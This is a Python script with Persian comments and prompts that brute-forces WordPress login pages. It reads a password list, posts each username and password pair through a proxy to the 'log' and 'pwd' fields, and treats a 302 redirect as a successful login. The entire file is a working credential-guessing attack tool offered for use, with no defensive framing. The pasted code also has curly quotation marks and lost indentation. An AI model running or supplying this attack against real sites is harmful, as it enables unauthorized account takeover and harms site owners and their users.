import requests

def brute_force_login(target_url, username, password_list_path, proxy_url):
try:
proxies = {
“http”: proxy_url,
“https”: proxy_url
}

with open(password_list_path, “r”) as file:
passwords = file.readlines()

print(f”[+] تعداد پسوردهای موجود در لیست: {len(passwords)}”)

for password in passwords:
password = password.strip()
print(f”[+] تست: {username} / {password}”)

data = {
“log”: username, # فیلد ورود وردپرس
“pwd”: password, # فیلد پسورد وردپرس
“wp-submit”: “Log In”
}

response = requests.post(target_url, data=data, proxies=proxies, allow_redirects=False)

if response.status_code == 302: # وضعیت موفقیت (Redirect)
print(f”[+] پسورد پیدا شد: {password}”)
return
elif response.status_code == 200: # تلاش ناموفق
print(f”[-] تلاش ناموفق با: {password}”)
else:
print(f”[!] وضعیت پاسخ غیرمنتظره: {response.status_code}”)

print(“[!] تمامی پسوردها تست شدند؛ نتیجه‌ای یافت نشد.”)
except FileNotFoundError:
print(“[!] فایل لیست پسورد یافت نشد.”)
except Exception as e:
print(f”[!] خطا: {e}”)

if __name__ == “__main__”:
target_url = input(“آدرس صفحه ورود هدف را وارد کنید: “)
username = input(“نام کاربری را وارد کنید: “)
password_list_path = input(“مسیر فایل لیست پسورد را وارد کنید: “)
proxy_url = input(“آدرس پراکسی (مثال: http://127.0.0.1:8080) را وارد کنید: “)

print(“\n[+] شروع تست Brute Force…”)
brute_force_login(target_url, username, password_list_path, proxy_url)